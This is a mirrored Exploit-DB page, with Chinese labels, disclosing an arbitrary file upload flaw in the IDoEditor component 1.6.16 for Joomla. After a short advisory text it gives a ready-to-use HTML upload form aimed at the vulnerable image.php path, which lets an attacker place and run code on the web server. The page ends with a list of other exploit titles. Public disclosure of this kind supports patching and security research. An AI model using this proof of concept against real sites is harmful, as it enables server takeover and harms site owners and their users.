Joomla! Component IDoEditor – ‘image.php’ Arbitrary File Upload

Exploit Database
20 阅读

作者： Sammy FORGIT

日期： 2012-06-13
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/37381/

source: https://www.securityfocus.com/bid/53973/info

The IDoEditor component for Joomla! is prone to a vulnerability that lets attackers upload arbitrary files because the application fails to adequately sanitize user-supplied input.

An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process.

IDoEditor 1.6.16 is vulnerable; other versions may also be affected. 

<html>
<body>
<center>
<form
action="http://www.example.com/plugins/editors/idoeditor/themes/advanced/php/image.php"
method="post" enctype="multipart/form-data">
<input type="file" name="pfile">
<input type="submit" name="Submit" value="Upload">
</form>
</center>
</body>
</html>

last Exploits
Joomla! Component IDoEditor – ‘image.php’ Arbitrary File Upload的更多信息

Horde Groupware Webmail Edition 5.2.22 – PHP File Inclusion：
Mevin Basic PHP Events Lister 2.03 – Cross-Site Request Forgery：
Profiling System for Human Resource Management 1.0 – Remote Code Execution (Unauthenticated)：
Valid tiny-erp 1.6 – SQL Injection：
Kinsey Infor/Lawson / ESBUS – SQL Injection：
File Management System 1.1 – Persistent Cross-Site Scripting：
PHPDirector Game Edition – ‘game.php’ SQL Injection：
TP-Link TL-SC3171 IP Cameras – Multiple Vulnerabilities：